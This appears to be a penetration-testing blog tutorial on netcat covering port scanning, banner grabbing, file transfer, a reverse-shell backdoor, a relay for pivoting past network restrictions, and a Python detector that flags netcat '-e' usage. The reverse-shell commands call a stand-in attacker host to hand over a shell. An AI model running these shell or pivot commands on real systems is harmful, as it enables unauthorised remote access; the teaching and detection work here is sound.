PARLAR

OFFENSIVE SECURITY - PENETRATION TESTING - RED TEAMING - ETHICAL HACKING

NETCAT: THE SWISS ARMY KNIFE OF NETWORKING

The ultimate networking utility in every hacker's toolkit

What is Netcat?

Netcat (nc) is a versatile networking utility for reading from and writing to network connections using TCP or UDP. It's designed to be a reliable back-end tool that can be used directly or driven by other programs and scripts.

$ nc -h
[v1.10-46]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, ...
        -h                      this help message
        -i secs                 delay interval for lines sent, ports scanned
// ...more options...

Key Features

Simple Port Scanning

Quickly check if specific ports are open on a target system.

$ nc -zv target.com 20-80
target.com [192.168.1.1] 22 (ssh) open
target.com [192.168.1.1] 80 (http) open

Banner Grabbing

Identify running services by capturing their banners.

nc -v target.com 22
File Transfer

Transfer files between systems without complex protocols.

# Receiver:
$ nc -l -p 1234 > received_file.txt

# Sender:
$ nc receiver.com 1234 < file_to_send.txt

Simple Chat Server

Create a basic chat server for text communication.

# Server:
$ nc -l -p 1234
Hello, is anyone there?

# Client:
$ nc server.com 1234
Hello, is anyone there?
Yes, I can hear you clearly!

Backdoor / Reverse Shell

Create remote backdoor access to systems (for authorized penetration testing only).

# Listener:
nc -l -p 4444

# Target (Windows):
nc -e cmd.exe attacker.com 4444

# Target (Linux):
nc -e /bin/bash attacker.com 4444

# Attacker:
$ nc -l -p 4444
whoami
john_doe
ls -la
total 32
drwxr-xr-x  5 john_doe staff  160 Oct 3 14:22 .
drwxr-xr-x 20 john_doe staff  640 Oct 3 11:15 ..
-rw-------  1 john_doe staff 8517 Oct 3 14:21 .bash_history
-rw-r--r--  1 john_doe staff  220 Oct 3 10:05 .bash_logout

Advanced Netcat Techniques

Web Server Testing

Manually test a web server by crafting HTTP requests.

$ nc www.example.com 80
GET / HTTP/1.1
Host: www.example.com

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2023 15:43:21 GMT
Server: ECS (dcb/7F5B)
Content-Length: 1256

Example Domain

Port Forwarding / Pivoting

Create a simple port relay to bypass network restrictions.

mkfifo /tmp/pipe
nc -l -p 8080 < /tmp/pipe | nc target.com 80 > /tmp/pipe

This creates a relay that forwards traffic from port 8080 on your machine to port 80 on target.com, allowing you to pivot through networks.

Encrypted Communication with Netcat

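Traditional netcat sends everything in cleartext, so for encrypted communications use OpenSSL's s_server and s_client in place of the nc listener and client.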

# Server:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

# Client:
openssl s_client -quiet -connect server.com:4433

Security Implications

While Netcat is an invaluable tool for legitimate security professionals, it's often flagged by antivirus software due to its potential for misuse. Always ensure you have proper authorisation before using Netcat on any system or network.
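
The detection side of that flagging, as an added example that is not part of the original page: it reads process command lines the way nc 1.10 reads its options (including clustered flags such as -lvp) and reports the ones that use -e or -c. The names classify_nc and exec_hits, the list of binary names and the sample lines are assumptions constructed for this illustration.

```python
import shlex

# Names traditional netcat is commonly installed under (assumed list).
NC_NAMES = {"nc", "netcat", "nc.traditional", "nc.exe"}
# Short options that take a value (nc 1.10): -c -e -g -G -i -o -p -q -s -w.
TAKES_ARG = set("cegGiopqsw")

def classify_nc(cmdline):
    """Return (tags, exec_target) for one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in NC_NAMES:
        return set(), None
    tags, target, i = set(), None, 1
    while i < len(argv):
        arg, i = argv[i], i + 1
        if not arg.startswith("-") or arg.startswith("--") or arg == "-":
            continue  # hostname, port, or a long option (not handled here)
        # Walk a cluster such as -lvp: the first flag that takes a value ends
        # the cluster; the value is the rest of the token or the next argument.
        for pos, flag in enumerate(arg[1:], start=1):
            if flag == "l":
                tags.add("listen")
            elif flag == "z":
                tags.add("scan")
            if flag in TAKES_ARG:
                value = arg[pos + 1:]
                if not value and i < len(argv):
                    value, i = argv[i], i + 1
                if flag in "ce":
                    tags.add("exec")
                    target = value
                break
    return tags, target

SAMPLE = [  # constructed process command lines, not real telemetry
    "nc -e /bin/bash attacker.com 4444",
    "nc.exe -e cmd.exe attacker.com 4444",
    "/usr/bin/nc -lvp 4444 -c 'ls -la'",
    "nc -zv target.com 20-80",
    "nc -l -p 1234",
    "rsync -e ssh src/ backup:/dst/",
]

def exec_hits(lines):
    """Lines where netcat hands a program to the socket, with that program."""
    return [(l, t) for l in lines for tags, t in [classify_nc(l)] if "exec" in tags]
```

Matching on the parsed option rather than on the substring "-e" keeps unrelated tools such as rsync -e out of the results; a renamed binary still needs hash or behaviour-based coverage.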